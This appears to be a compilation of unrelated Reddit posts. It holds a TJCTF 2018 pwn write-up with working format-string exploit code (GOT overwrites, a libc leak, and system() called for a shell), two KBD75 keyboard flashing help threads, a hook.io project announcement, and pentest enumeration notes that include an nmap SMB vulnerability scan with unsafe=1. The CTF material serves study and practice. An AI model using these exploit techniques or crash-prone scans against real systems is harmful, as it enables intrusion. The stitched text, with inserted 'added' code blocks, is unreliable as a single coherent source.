4 chars for the PIN + 13 bytes to fill the rest of the buffer and the saved RBP + the new RIP (the address of name in the BSS)

(Screenshot: running the exploit)
Flag: tjctf{d4n6_17_y0u_r0pp3d_m3_:(}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/problem.py

Secure Secrets

The challenges until now were pretty easy; the real fun starts now. Don't be scared, they are still easy, but they need a little more work than the others, as we no longer have the source code and we need to do format string exploitation.
(Screenshot: running the application)
This is how the application looks. It just reads a password and a message, then shows the message. Let's open the binary in IDA Pro (or Hopper). Both can generate pseudo-code for the program (press F5 in IDA, or look in Hopper's top menu), but for now let's analyze some assembly.
We don't see any buffer overflow, but the following code from get_message() looks interesting:

```
.text:0804885D    mov     eax, [ebp+arg_0]
.text:08048860    mov     [ebp+var_2C], eax
...
.text:080488EC    push    [ebp+var_2C]    ; format
.text:080488EF    call    _printf
.text:080488F4    add     esp, 10h
```

var_2C holds the argument passed to the function, which is our message, and it is passed directly to printf() as the format string: a format string vulnerability! The classic scenario would be to leak libc, overwrite some function's GOT entry with system() and pass "/bin/sh" to it, but it is even easier. Investigating the binary a bit more, we find another function named get_secret() with some pretty interesting code in it:

```
.text:08048727    push    offset modes      ; "r"
.text:0804872C    push    offset filename   ; "flag.txt"
.text:08048731    call    _fopen
```

So it is clear: we need to overwrite a GOT entry with the address of this function. I chose puts(), as it is called a few times after our exploit. We need to write 0x08048713 (get_secret) at 0x0804A028 (puts@GOT) to get the flag, using two 2-byte writes (if you are not familiar with this kind of exploit, read up on format string GOT overwrites first). Before we craft the exploit we need to know where our controlled buffer sits on the stack, so that printf can pick addresses from it. Setting a breakpoint before the printf at 0x080488EF and dumping the stack shows that %35$x is our buffer.
A short explanation for those who don't see how I got that number. Open the executable in GDB and put a breakpoint at that printf. Enter something like AAAABBBB %x %x %x as the message and continue. When the breakpoint is hit, dump the stack, then step to the next instruction. The printf output will be something like:

```
AAAABBBB ffffc5ec f7fa05c0 fbad2887
```

Now let's search for those values in the stack dump.

(Screenshot: GDB stack dump, with the values printed by printf and the buffer highlighted)

In the first box are the values printed by printf and in the second the buffer itself. The distance from the first printed argument to the buffer is 35 arguments. So, when we want to overwrite a few addresses using the %n conversion, we put those addresses at the beginning of our buffer and use the %<index>$n syntax to reach them. Let's proceed.
Using Python I generated the payload in a tidy manner:

```python
from pwn import *

arg_off = 35
puts_GOT = 0x0804A028
get_secret_ADDR = 0x08048713
write1 = 0x0804 - 8              # the 8 address bytes are printed before the first %x
write2 = 0x8713 - write1 - 8
payload = p32(puts_GOT + 2) + p32(puts_GOT) + "%{}x%{}$hn%{}x%{}$hn".format(write1, arg_off, write2, arg_off + 1)
```

First we write the half with the smaller value, then the larger one, because printf's character counter only grows. After running it we get: tjctf{n1c3_j0b_y0u_r34lly_GOT_m3_600d}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/secure.py

Super Secure Secrets

(Screenshot: running the application)
We have almost the same challenge, but with improved security, so let's do the standard checks.
(Screenshot: checksec and the other standard checks)
Now there is no get_secret() function and no buffer overflow, but we still have the same format string vulnerability in the view-message functionality. We need to follow the classic scenario: leak an address from libc to compute its base, keep the program alive long enough to use it, and redirect a GOT entry to system().
Leaking libc means dumping the stack before the printf and checking whether any libc address can be reached with the %<index>$p trick. As this is a 64-bit binary, the first six integer arguments are passed in registers; the format string is the first of them, so the five that follow come from registers and the first value taken from the stack is %6$p. Let's use %6$p %7$p %8$p to dump a few values:

```
0x7fffffffd390 0x7fffffffd3b0 0x100000000
```

(Screenshot: leaked arguments)
Here we have the values we printed. Looking further down the stack we see this:
(Screenshot: libc address on the stack)
The address sits at offset 0x1d8 from the first stack argument; dividing by the pointer size on a 64-bit arch (8 bytes) gives 59, and adding the 6 at which stack arguments start gives position 65. So at %65$p we have the return address into __libc_start_main, from which we can compute the base address of libc. Now we have two problems ahead: we must find out which libc version the server runs, and we must keep the program from exiting after the exploit fires.
Let's solve them one by one. We have two options to get the libc version. The first is to leak argument 65 from the remote server, take its signature (the last three hex digits, which ASLR does not change because libc is mapped at a page-aligned address) and look it up with https://libc.blukat.me/ or https://github.com/niklasb/libc-database. In that case the leaked address was 0x7fdf0a8a7b97 (it changes every run, only the last digits stay the same, this is just an example) and its signature is b97. The second option is to use an already solved pwn challenge on the same server to read the libc version directly; it is not very fair play, but remember this trick, it is very useful in CTFs with esoteric libc versions.
Both lead to the same answer: libc6_2.27-3ubuntu1_amd64
(Screenshot: searching for the libc version)
The offset of that return address in this libc is 0x21b97, so we can now get the base address whenever we want, but we still need to keep the program from closing. Let's look at the code that runs after our exploit (I used IDA to decompile it):
```c
unsigned __int64 __fastcall get_message(char *a1, const char *a2)
{
    // ... code before this is not relevant
    printf(a1, &s, a2);
    puts("====================");
    for ( i = 0; i <= 5; ++i )
        v4[i] = byte_401238[rand() % 62];
    v5 = 0;
    puts("As a free trial user, please complete the following captcha for our monitoring purposes.");
    printf("Captcha: %s\n", v4);
    fgets(&s2, 7, stdin);
    if ( !strcmp(v4, &s2) )
    {
        puts("Thank you for your cooperation...");
    }
    else
    {
        memset(a1, 0, 0x80uLL);
        puts("Incorrect captcha, your message was removed from our database.");
    }
    return __readfsqword(0x28u) ^ v8;
}
```

After this function returns, the program exits. The simplest solution is to overwrite the GOT entry of a function that is called before the exit and return to the beginning of the program. memset() is not used anywhere else, and it is called on the wrong-captcha path, which we can take on purpose, so let's rewrite its GOT entry with 0x400DA0 (the address where the menu is printed and the interaction starts).
Crafting the payload is a little tricky: we are on 64-bit now and the addresses contain zero bytes, so we can't put them at the beginning of our message because the NUL would terminate the format string. We could put them at the end, but in my case I chose to put them in the password buffer and reference them from there.
After finding the right offsets, we can craft the following vector, which leaks libc and overwrites memset@GOT:

```python
# addresses
memset_GOT = 0x602050
secure_service_ADDR = 0x400DA0

# payload that leaks libc and rewrites the memset() GOT entry to secure_service()
# write zeros into the upper 4 bytes and the address into the lower 4
# the two target addresses are stored in the password buffer
off = 22         # stack argument index of the password buffer
leak_off = 65    # stack argument index of the return address into __libc_start_main
payload = "%{}$n%{}${}p%{}$n".format(off + 1, leak_off, secure_service_ADDR, off)
...
leaked_libc = stack_leak_address - 0x21b97   # libc base
```

The next step is to get a shell. memset() is called with our message as its first argument, so if we replace it with system() and start our message with "sh || ", we get a shell, and the rest of the string only runs if sh fails, so its errors are ignored. So, let's write the payload:

```python
# payload that rewrites the memset() GOT entry to system()
write1 = (0xffff00000000 & system_ADDR) // 0x100000000
write2 = (0x0000ffff0000 & system_ADDR) // 0x10000
write3 = (0x00000000ffff & system_ADDR)

# sort the writes in ascending order, the %n counter can only grow
writes = [
    (write1, p64(memset_GOT + 4)),
    (write2, p64(memset_GOT + 2)),
    (write3, p64(memset_GOT + 0)),
]
writes.sort(key=lambda tup: tup[0])
print(writes)
addresses = ''.join(x[1] for x in writes)   # goes into the password buffer
write3 = writes[0][0]
write2 = writes[1][0]
write1 = writes[2][0]

code = "sh || "
payload = code + "%{}x%{}$hn%{}x%{}$hn%{}x%{}$hn".format(
    write3 - len(code), off,
    write2 - write3, off + 1,
    write1 - write2, off + 2)
```

Running the full script gives great results:
(Screenshot: running the exploit)
Flag: tjctf{4r3_f0rm47_57r1n65_63771n6_0ld_y37?}
Full solution: https://github.com/JustBeYou/ctfs/blob/master/tjctf2018/super_secure.py
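To check the arithmetic of both format string payloads offline, here is an added Python example (it is not part of the write-up or of the linked solutions): it builds the sorted %hn write sequence for a target address and runs it through a small emulation of printf's character counting, so you can see the bytes land before touching the binary. The 32-bit layout uses the Secure Secrets numbers from above (puts@GOT 0x0804A028, get_secret 0x08048713, argument 35, pointers printed first); the 64-bit one uses memset@GOT 0x602050, argument 22 and the "sh || " prefix from Super Secure Secrets with a hypothetical system() address, since the real one only comes from the leak. It pads with %c (exactly width characters) instead of the write-up's %x, and, like the write-up, it mixes sequential %c with positional %N$hn, which glibc accepts.

```python
import re
import struct

def split_halves(addr, value, bits=32):
    """Break a pointer-sized value into (target address, 16-bit chunk) pairs,
    one per %hn write, little-endian."""
    return [(addr + i, (value >> (8 * i)) & 0xFFFF) for i in range(0, bits // 8, 2)]

def build_fmt(chunks, arg_off, start_count=0):
    """Build the format string for a list of (addr, value16) writes.

    Chunks are sorted by value because printf's character counter only grows;
    each %c width pads the counter up to the next value modulo 2^16, which is
    all that %hn stores.  The i-th pointer in the returned order must be
    positional argument arg_off + i.  start_count is what printf has already
    printed before the first conversion (the pointers, or a "sh || " prefix)."""
    order = sorted(chunks, key=lambda c: c[1])
    fmt, count = "", start_count
    for i, (addr, val) in enumerate(order):
        delta = (val - count) % 0x10000
        if delta == 1:
            fmt += "%c"
        elif delta > 1:
            fmt += "%{}c".format(delta)
        count += delta
        fmt += "%{}$hn".format(arg_off + i)
    return fmt, [addr for addr, _ in order]

# the restricted grammar produced above: "%<width>c" and "%<index>$hn"
SPEC = re.compile(r"%(?:(\d+)\$hn|(\d*)c)")

def simulate_printf(fmt, prefix_len, pointers, arg_off, memory):
    """Emulate printf's output counting and the %hn stores for that grammar.
    pointers[i] is positional argument arg_off + i; memory maps addr -> byte.
    Returns the final character count."""
    count, pos = prefix_len, 0
    for m in SPEC.finditer(fmt):
        count += m.start() - pos                  # literal text between conversions
        pos = m.end()
        if m.group(1) is None:
            count += max(1, int(m.group(2) or 1))  # %c prints max(width, 1) characters
        else:
            addr = pointers[int(m.group(1)) - arg_off]
            memory[addr] = count & 0xFF            # %hn: little-endian 16-bit store
            memory[addr + 1] = (count >> 8) & 0xFF
    return count + len(fmt) - pos

def read_value(memory, addr, size):
    return sum(memory.get(addr + k, 0) << (8 * k) for k in range(size))

def secure_secrets_payload(puts_got=0x0804A028, get_secret=0x08048713, arg_off=35):
    """32-bit layout: the two pointers first (no NUL bytes in them), then the
    format string.  printf prints the pointers too, hence start_count = 8."""
    chunks = split_halves(puts_got, get_secret, 32)
    fmt, order = build_fmt(chunks, arg_off, start_count=4 * len(chunks))
    return b"".join(struct.pack("<I", a) for a in order) + fmt.encode(), fmt, order

def check_secure_secrets():
    payload, fmt, order = secure_secrets_payload()
    memory = {}
    simulate_printf(fmt, 4 * len(order), order, 35, memory)
    return read_value(memory, 0x0804A028, 4)      # expected: 0x08048713

def super_secure_fmt(system_addr, memset_got=0x602050, arg_off=22, prefix="sh || "):
    """64-bit variant: the pointers live elsewhere (the password buffer in the
    write-up), only the prefix is printed before the conversions, and the top
    two bytes of the GOT entry are left alone because they are already zero."""
    chunks = split_halves(memset_got, system_addr, 64)[:3]
    return build_fmt(chunks, arg_off, start_count=len(prefix))

def check_super_secure(system_addr=0x7f3c1e8d6440):   # hypothetical libc address
    fmt, order = super_secure_fmt(system_addr)
    memory = {}
    simulate_printf(fmt, len("sh || "), order, 22, memory)
    return read_value(memory, 0x602050, 8)        # expected: system_addr
```

check_secure_secrets() reproduces the write-up's ordering (puts@GOT + 2 is written first, with 0x0804, then puts@GOT with 0x8713) and check_super_secure() shows the wrap-around case: when the next 16-bit value is smaller than the running count, the padding is taken modulo 65536 and %hn still stores the right half.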
And here we are, at the end of the journey. We pwned them all! TJCTF was a great experience with pretty interesting tasks that were beginner oriented, so I recommend it to any newcomer as the organizers did a really great job to assure a high quality CTF.
Don’t forget to subscribe and follow my Github for more wargames solutions and guides. Thanks for reading!
submitted by l1ttl3wh0 to securityCTF [link] [comments]

[HELP] KBD75 QMK flashing problems

FIXED Leaving this up so if someone searches they can find the solution. DO NOT USE ANY SPACES IN YOUR FILE NAME. Yes really, that's it. So wherever you save the .hex file for the layout do not use any spaces and you will not have this issue. Thanks a ton to yanfali for this simple solution. Once again proving that you have to be slightly smarter than your PC.
This is my first time trying to flash a keyboard, I followed all the steps found here KBD75 + QMK.
So after the first flash attempt with QMK Flasher I get this error message:

```
Choose .hex
Flash When Ready
dfu-programmer atmega32u4 erase --force
Erasing flash... Success
Checking memory from 0x0 to 0x6FFF... Empty.
dfu-programmer atmega32u4 flash C:\Users\DaneG\Documents\KBD75 layout\kbd75hhkb.hex
dfu-programmer 0.7.0
https://github.com/dfu-programmer/dfu-programmer
Usage: dfu-programmer target[:usb-bus,usb-addr] command [options] [global-options] [file|data]
global-options: --quiet --debug level (level is an integer specifying level of detail)
Global options can be used with any command and must come after the command and before any file or data value

command summary:
  launch [--no-reset]
  read [--force] [--bin] [(flash)|--user|--eeprom]
  erase [--force] [--suppress-validation]
  flash [--force] [(flash)|--user|--eeprom] [--suppress-validation] [--suppress-bootloader-mem] [--serial=hexdigits:offset] {file|STDIN}
  setsecure
  configure {BSB|SBV|SSB|EB|HSB} [--suppress-validation] data
  get {bootloader-version|ID1|ID2|BSB|SBV|SSB|EB|manufacturer|family|product-name|product-revision|HSB}
  getfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST|BODEN|ISP_BOD_EN|ISP_IO_COND_EN|ISP_FORCE}
  setfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST|BODEN|ISP_BOD_EN|ISP_IO_COND_EN|ISP_FORCE} data

additional details:
  launch: Launch from the bootloader into the main program using a watchdog reset. To jump directly into the main program use --no-reset.
  read: Read the program memory in flash and output non-blank pages in ihex format. Use --force to output the entire memory and --bin for binary output. User page and eeprom are selected using --user and --eprom
  erase: Erase memory contents if the chip is not blank or always with --force
  flash: Flash a program onto device flash memory. EEPROM and user page are selected using --eeprom|--user flags. Use --force to ignore warning when data exists in target memory region. Bootloader configuration uses last 4 to 8 bytes of user page, --force always required here.
Note: version 0.6.1 commands still supported.
An error occurred - please try again.
```
After this QMK Flasher allows me to try and flash the keyboard over and over even after unplugging and replugging the USB. My KBD75 does not light up or register keystrokes when plugged in, it seems like it is stuck in bootloader mode. It may be relevant that before installing the drivers my keyboard registers as 'ATm32UDFU'. After installing the drivers it is 'ATmega32u4'.
The KBDfans website says that these are R6 and the PCB is white, I haven't checked for the manual reset button on the PCB yet but I will start taking apart the keyboard after posting this to see if that will solve the issue. That same guide linked above mentioned that some KBD75 were only flashable with Bootmapper Client but when I tried to 'Download' the layout or 'Toggle Bootmapper' in the program I get this error message "Error opening ps2avrGB device: The specified device was not found". Not sure if this means my PCB won't work with Bootmapper Client or just the keyboard is already in bootloader so the program cannot detect the layout or put it into bootloader again. I have never used this program either but after the error message I have not tried to create a layout and flash it. Without being able to detect the keyboard I am not sure how to do it manually by just the rows and columns.
Sorry for the wall of text, any help would be much appreciated as my new board is now a pretty brick :).
TLDR; New KBD75 seems stuck in bootloader after first flash attempt with QMK Flasher. PC still detects it.
*UPDATE* I took apart the case and tried manually resetting the PCB. It doesn't change anything, once I reset it the PC detects the keyboard like usual and QMK Flasher lets me flash the keyboard again to no effect.
submitted by OleDaneBoy to MechanicalKeyboards [link] [comments]

[HELP!] error flashing KBD75. not working at all now.

I was trying to re-flash my KBD75 with a few macros and slightly changed layout, and now it completely stopped working (no lights or response at all)
I've tried flashing with the default .hex and still nothing.
This is what QMK says:

```
Choose .hex
Flash Keyboard
dfu-programmer atmega32u4 erase --force
Erasing flash... Success
Checking memory from 0x0 to 0x6FFF... Empty.
dfu-programmer atmega32u4 flash E:\Alan\Programs\Keeb stuff\20180218qmk84.hex
dfu-programmer 0.7.0
https://github.com/dfu-programmer/dfu-programmer
Usage: dfu-programmer target[:usb-bus,usb-addr] command [options] [global-options] [file|data]

global-options: --quiet --debug level (level is an integer specifying level of detail)
Global options can be used with any command and must come after the command and before any file or data value

command summary:
  launch [--no-reset]
  read [--force] [--bin] [(flash)|--user|--eeprom]
  erase [--force] [--suppress-validation]
  flash [--force] [(flash)|--user|--eeprom] [--suppress-validation] [--suppress-bootloader-mem] [--serial=hexdigits:offset] {file|STDIN}
  setsecure
  configure {BSB|SBV|SSB|EB|HSB} [--suppress-validation] data
  get {bootloader-version|ID1|ID2|BSB|SBV|SSB|EB|manufacturer|family|product-name|product-revision|HSB}
  getfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST|BODEN|ISP_BOD_EN|ISP_IO_COND_EN|ISP_FORCE}
  setfuse {LOCK|EPFL|BOOTPROT|BODLEVEL|BODHYST|BODEN|ISP_BOD_EN|ISP_IO_COND_EN|ISP_FORCE} data

additional details:
  launch: Launch from the bootloader into the main program using a watchdog reset. To jump directly into the main program use --no-reset.
  read: Read the program memory in flash and output non-blank pages in ihex format. Use --force to output the entire memory and --bin for binary output. User page and eeprom are selected using --user and --eprom
  erase: Erase memory contents if the chip is not blank or always with --force
  flash: Flash a program onto device flash memory. EEPROM and user page are selected using --eeprom|--user flags. Use --force to ignore warning when data exists in target memory region. Bootloader configuration uses last 4 to 8 bytes of user page, --force always required here.
Note: version 0.6.1 commands still supported.
An error occurred - please try again.
```

Have I killed it somehow? Please help.
submitted by MrSupernonchalant to MechanicalKeyboards [link] [comments]
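A small Python check, added here as an example and not part of either post, of QMK Flasher or of dfu-programmer: it verifies the Intel HEX record checksums before flashing, refuses images that reach past the application area dfu-programmer reports in the logs above (0x0 to 0x6FFF; that the 4 KiB above it belong to the bootloader is an assumption about this board), and builds the dfu-programmer command as an argv list so that a path containing a space stays one argument. In both posts the failing path does contain a space (KBD75 layout, Keeb stuff), and dfu-programmer printing its usage text is what happens when the path reaches it split in two. The sample records are constructed.

```python
import subprocess

# Application flash on the ATmega32U4 as dfu-programmer reports it in the logs
# above ("Checking memory from 0x0 to 0x6FFF"); assumption: the 4 KiB above it
# hold the DFU bootloader and must not be written.
APP_FLASH_END = 0x6FFF

class HexError(ValueError):
    pass

def parse_ihex(text):
    """Parse Intel HEX records into {absolute address: byte}, verifying every
    record checksum (all bytes of a record, checksum included, sum to 0 mod 256)."""
    memory, base = {}, 0
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if line[0] != ":":
            raise HexError("line %d: record must start with ':'" % n)
        try:
            raw = bytes.fromhex(line[1:])
        except ValueError:
            raise HexError("line %d: not hexadecimal" % n)
        if len(raw) < 5:
            raise HexError("line %d: record too short" % n)
        if sum(raw) & 0xFF:
            raise HexError("line %d: checksum mismatch" % n)
        length, addr, rtype, data = raw[0], (raw[1] << 8) | raw[2], raw[3], raw[4:-1]
        if len(data) != length:
            raise HexError("line %d: length field does not match the data" % n)
        if rtype == 0:                                   # data record
            for i, b in enumerate(data):
                memory[base + addr + i] = b
        elif rtype == 1:                                 # end of file
            return memory
        elif rtype == 2:                                 # extended segment address
            base = ((data[0] << 8) | data[1]) << 4
        elif rtype == 4:                                 # extended linear address
            base = ((data[0] << 8) | data[1]) << 16
        else:
            raise HexError("line %d: unsupported record type %d" % (n, rtype))
    raise HexError("missing end-of-file record")

def fits_application(memory, end=APP_FLASH_END):
    """True if no byte lands in the bootloader section; dfu-programmer itself
    refuses such images unless --suppress-bootloader-mem is given."""
    return not memory or max(memory) <= end

def verify_text(text):
    """(True, number of bytes) for a sound image, (False, reason) otherwise."""
    try:
        memory = parse_ihex(text)
    except HexError as e:
        return False, str(e)
    if not fits_application(memory):
        return False, "image extends past 0x%04X" % APP_FLASH_END
    return True, len(memory)

def dfu_flash_argv(hex_path, target="atmega32u4"):
    """The flash command as an argv list: subprocess passes each element as one
    argument, so a path with spaces is not split (the usage text in the posts is
    dfu-programmer seeing 'C:\\...\\KBD75' and 'layout\\kbd75hhkb.hex' as two
    separate arguments)."""
    return ["d fu-programmer".replace(" ", ""), target, "flash", hex_path]

def flash(hex_path):
    with open(hex_path) as f:
        ok, detail = verify_text(f.read())
    if not ok:
        raise HexError(detail)
    return subprocess.run(dfu_flash_argv(hex_path), check=True)

# constructed sample: two data records and the EOF record, plus a copy with one
# checksum digit flipped
SAMPLE_HEX = (":10010000214601360121470136007EFE09D2190140\n"
              ":0B0010006164647265737320676170A7\n"
              ":00000001FF\n")
CORRUPT_HEX = SAMPLE_HEX.replace("D2190140", "D2190141")
```

If you call dfu-programmer from a shell instead, the same rule applies: quote the path ("C:\Users\DaneG\Documents\KBD75 layout\kbd75hhkb.hex") or, as the fix in the posts says, keep spaces out of it.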

I built a 100% open-source hosting platform for JavaScript microservices and webhooks, in Javascript. Ask me anything! Architectural write-up included.

Hello. I built a 100% open-source hosting platform for JavaScript microservices, in Javascript. Ask me anything!
The project: http://hook.io
The source code: http://github.com/bigcompany/hook.io
Built with: Node.js, CouchDB, and Github Gist. Node Package Manager modules are fully supported.
Architectural details can be found a bit further down.
Interested, but too busy to read this now?
If you'd like, you can run the following Curl command to opt-in to our mailing list. We'll periodically send you updates about the project.
curl [email protected]
Replace [email protected] with your email address.
What is the purpose of hook.io?
hook.io is an open-source hosting platform for webhooks and microservices. The microservice architectural style is an approach to developing a single application as a suite of small services, each running in its own process and communicating with lightweight mechanisms. hook.io provides an easy way to create, host, and share microservices. Through developing many small re-usable microservices, you can reduce the complexity of your applications while improving stability.
Why or how would I want to use hook.io?
You should want to use hook.io if it can make your life as a developer easier.
The most basic use-case for hook.io is quick and free webhook hosting. You can instantly create a simple hook which parses the incoming parameters of an HTTP request and performs arbitrary actions on it. For instance: send an SMS message every time the Hook is requested as a webpage. Since NPM is supported, you can re-use any existing library from the extensive NPM module repository. You can also configure Hooks to be executed on a schedule using a Cron pattern.
Note that Hooks are fully streaming. Inside your Hook source code you have direct access to Node's http.IncomingMessage and http.ServerResponse request and response streams. This means you can treat the inside of a Hook exactly as if it were inside a streaming middleware in a regular Node HTTP server. Having direct access to these streams is extremely useful and I am unsure whether any other microservice hosting provider currently offers this feature.
More advanced use-cases for hook.io would be replacing individual parts of your application with microservices. Instead of adding a new route or module to your application, you could instead create a Hook responsible for only one unit of functionality and call it with a regular HTTP request from inside your existing application. One specific example could be building a Hook with a custom theme which acts as a stand-alone sign-up form. This sign-up form can then be loaded server-side in your application using one HTTP GET request. It might sound complicated at first, but integrating microservices with your existing application is actually very easy. In the upcoming weeks we'll work on releasing specific guides for separating application functionality into microservices.
An even more advanced usage would be building a suite of Hooks and composing them to create new and unique applications! Since every Hook understands Standard In and Standard Out and Hooks can easily call other Hooks from inside each other, there are an endless amount of combinations to be made. This composability enables the foundation for Flow-based Programming without imposing any specific rules for composition. A specific example could be building a Hook ( called "tar" ) responsible for taking in STDIN and streaming out a compressed tar file. Once this Hook is created, you could easily pipe the results of another Hook ( such as an image downloader ) into the "tar" Hook. These Hooks don't exist yet, but I am certain someone will build them in the near future.
Unix Pipes!
hook.io is very friendly with Unix Pipes. Using STDOUT and STDIN you can connect hook.io to your existing Unix Tool chain. The best way to explain this concept is to review the Curl examples.
Here is one specific example of using hook.io to flip a cat upside-down with cat and curl. You will need to provide your own cat.png
cat cat.png | curl -F 'degrees=180' -F '[email protected];type=image/png' http://hook.io/Marak/image/rotate > upsidedown-cat.png
The Data!
If you noticed in the last example, hook.io is fully capable of streaming binary data. It also supports streaming file uploads, multipart form uploads, and will assist in parsing all incoming form fields, JSON, and query string data.
Software Architecture
The core software architecture of hook.io is Resource-View-Presenter ( RVP ).
Resources are created using the npm resource module.
View-Presenters are created using the npm view module with regular HTML, CSS, and JavaScript. The same View-Presenter pattern is also used to implement custom theming for Hooks see: hook.io/themes
Important dependencies
mschema - Provides validation through-out the entire stack.
big - Small application framework. Provides website app which hook.io extends.
resource-http - Provides core HTTP server API. Helps in configuring Express with middlewares like Passport
resource-mesh - Provides a distributed event emitter mesh using a star network topography. hook.io primarily uses this module as a monitoring agent to report status back to our monitoring sink.
resource-user - Provides basic user API ( signups / logins / encrypted passwords / password resets / etc )
Server Architecture
There is one front-facing HTTP server and any number of Hook Workers.
The front-facing server is responsible for serving static content, maintaining user session data, and piping requests between the client and Worker.
Workers are responsible for executing user-submitted source code and piping their responses through the front-facing server to the client.
At this point, we will take note that communication between the Hook and client remains streaming throughout the entire architecture. This gives hook.io the ability to perform complex tasks like transcoding large video streams without worrying about clogging up any parts of the system with large memory buffers.
Hook Servers and Hook Workers are immutable and stateless to ensure stability of the platform. They are designed to fail fast and restart fast. mon is used as a process supervisor.
This architecture can theoretically scale to upwards of 10,000 concurrent connections. Realistically, it will probably be closer to 4,000. When the site needs to scale past this, we will create several front-facing servers and load balance incoming HTTP requests to them using DNS.
Hook and User configuration data are stored in a CouchDB database. If the database grows too large, we will split it into several smaller database servers, sharded by the first letter of every document's primary key.
Source code for Hooks is currently stored on Github as Github Gists. I'd imagine sometime in the future we will add the option to store and edit source code directly on hook.io itself. The project is open-source, so you could be the first to open up the issue!
Questions? Comments? Feedback?
Let me know! Open-source projects get better with collaboration. Every comment and piece of feedback counts.
Maybe take five minutes to try the platform out? You might like it!
The dependency tree for hook.io is re-used in many applications. Several of these dependencies I maintain myself. If you have feedback or comments about any specific dependency let me know!
submitted by _Marak_ to javascript [link] [comments]

noob friendly notes part 2

Recon and Enumeration

nmap -v -sS -A -T4 target - Nmap verbose scan, runs a SYN stealth scan, T4 timing (should be ok on a LAN), OS and service version detection, traceroute and the default scripts against the discovered services
nmap -v -sS -p- -A -T4 target - As above but scans all 65535 TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target - As above but scans all TCP ports and also runs a UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X - Nmap script to scan for vulnerable SMB servers - WARNING: unsafe=1 may crash the target; newer Nmap releases replaced smb-check-vulns with the smb-vuln-* scripts
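Once the Nmap scan is done, the next notes (nbtscan, enum4linux, snmpwalk, nikto) need a target list. Added here as an example, not part of the original notes: a Python parser for Nmap's XML output (add -oX scan.xml to the scans above) that keeps only hosts that are up and ports that are open, and turns them into the follow-up commands from this cheat sheet. The XML below is constructed to look like Nmap's output; the -oX flag is real, the hosts and services are invented.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap -oX output (trimmed to the elements
# used here); the hosts and services are invented.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -v -sS -sU -A -oX scan.xml 192.168.1.0/24">
  <host><status state="up"/>
    <address addr="192.168.1.10" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="fileserver" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="microsoft-ds" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.6p1"/></port>
      <port protocol="tcp" portid="23"><state state="closed"/><service name="telnet"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.1.20" addrtype="ipv4"/>
    <ports>
      <port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="nginx" version="1.14.0"/></port>
    </ports>
  </host>
  <host><status state="down"/><address addr="192.168.1.30" addrtype="ipv4"/></host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return the open ports as dicts (host, hostname, proto, port, service,
    product, version).  Hosts that are down and ports that are not open are skipped."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ""
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            results.append({
                "host": addr, "hostname": hostname,
                "proto": port.get("protocol"), "port": int(port.get("portid")),
                "service": get("name"), "product": get("product"), "version": get("version"),
            })
    return results

def targets_for(results, service_names, proto="tcp"):
    """Sorted hosts exposing one of the given services over the given protocol."""
    return sorted({r["host"] for r in results
                   if r["proto"] == proto and r["service"] in service_names})

def next_steps(results):
    """Turn the open services into the follow-up commands from these notes."""
    cmds = []
    for h in targets_for(results, {"microsoft-ds", "netbios-ssn"}):
        cmds.append("enum4linux -a %s" % h)
    for h in targets_for(results, {"snmp"}, proto="udp"):
        cmds.append("snmpwalk -c public -v1 %s 1" % h)
    for h in targets_for(results, {"http", "https"}):
        cmds.append("nikto -h %s" % h)
    return cmds

if __name__ == "__main__":
    for cmd in next_steps(parse_nmap_xml(SAMPLE_NMAP_XML)):
        print(cmd)
```

Point parse_nmap_xml at the contents of a real scan.xml and the same three functions give you the SMB, SNMP and web hosts for the sections below; closed and filtered ports never make it into the list, so nothing gets enumerated by mistake.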

SMB enumeration

ls /usr/share/nmap/scripts/* | grep ftp - Search the Nmap scripts for a keyword
nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on the subnet, finds Windows MAC addresses, NetBIOS names and the client workgroup / domain
enum4linux -a target-ip - Do everything, runs all options (find Windows client domain / workgroup) apart from dictionary-based share name guessing

nbtscan

nbtscan -v - Displays the nbtscan version
nbtscan -f target(s) - This shows the full NBT resource record responses for each machine scanned, not a one line summary, use this options when scanning a single host
nbtscan -O file-name.txt target(s) - Sends output to a file
nbtscan -H - Generate an HTTP header
nbtscan -P - Generate Perl hashref output, which can be loaded into an existing program for easier processing, much easier than parsing text output
nbtscan -V - Enable verbose mode
nbtscan -n - Turns off the inverse name lookup, useful when reverse resolution hangs
nbtscan -p PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query
nbtscan -m - Include the MAC (aka "Ethernet") addresses in the response, which is already implied by the -f option.

Other Host Discovery

netdiscover -r 192.168.1.0/24 - Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site

SMB Enumeration

nbtscan 192.168.1.0/24 - Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ip - Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

